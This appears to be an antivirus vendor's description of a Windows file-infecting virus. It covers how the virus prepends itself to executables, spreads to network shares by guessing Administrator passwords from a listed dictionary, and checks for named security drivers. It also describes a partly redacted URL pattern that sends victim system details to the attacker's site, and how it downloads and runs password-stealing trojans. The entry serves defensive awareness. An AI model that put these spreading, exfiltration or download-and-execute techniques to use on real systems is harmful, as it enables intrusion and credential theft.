The virus infects all write accessible Windows executable files (PE-EXE) on all disks on the victim computer and in accessible network folders. The virus does not infect files with the following names:
wooolcfg.exe woool.exe ztconfig.exe patchupdate.exe trojankiller.exe xy2player.exe flyff.exe xy2.exe au_unins_web.exe cabal.exe cabalmain9x.exe cabalmain.exe meteor.exe patcher.exe mjonline.exe config.exe zuonline.exe userpic.exe main.exe dk2.exe autoupdate.exe dbfsupdate.exe asktao.exe sealspeed.exe xlqy2.exe game.exe wb-service.exe nbt-dragonraja2006.exe dragonraja.exe mhclient-connect.exe hs.exe mts.exe gc.exe zfs.exe neuz.exe maplestory.exe nsstarter.exe nmcosrv.exe ca.exe nmservice.exe kartrider.exe audition.exe zhengtu.exe
The virus writes its executable file to the beginning of the file being infected, displacing the original contents of the file downwards.
In order to infect files located in network folders, the virus attempts to connect to remote machines using the Administrator account and one of the following passwords:
zxcv qazwsx qaz qwer !@#$%^&*() !@#$%^&*( !@#$%^&* !@#$%^& !@#$%^ !@#$% aasdf sdfgh !@#$ 654321 123456 12345 1234 123 111
The virus also sends information to the remote malicious user’s site about the amount of free space on the C disk, the operating system and Internet Explorer versions on the victim machine, and about the presence of drivers in the system which have one of the names listed below:
Hooksys KWatch3 KregEx KLPF NaiAvFilter1 NAVAP AVGNTMGR AvgTdi nod32drv PavProtect TMFilter BDFsDrv VETFDDNT
This information is sent in the following request to the remote malicious user’s site:
http://****mrw0rldwide.com/co.asp?action=post&HD=<amount of free space> &OT=<operating system version> &IV=<version of Internet Explorer> &AV=<installed drivers>
The virus also gets a list of files to be downloaded from the following link:
It then downloads files from the list, saves them to the Windows temporary directory and launches them for execution.
At the time of writing, the virus downloaded files from the following links:
and saved them as shown below:
%Temp%css.jpg – this file is 62 792 bytes in size. It will be detected by Kaspersky Anti-Virus as Trojan-PSW.Win32.OnLineGames.afd;
%Temp%wow.jpg – this file is 40 241 bytes in size. It will be detected by Kaspersky Anti-Virus as Trojan-PSW.Win32.WOW.sv.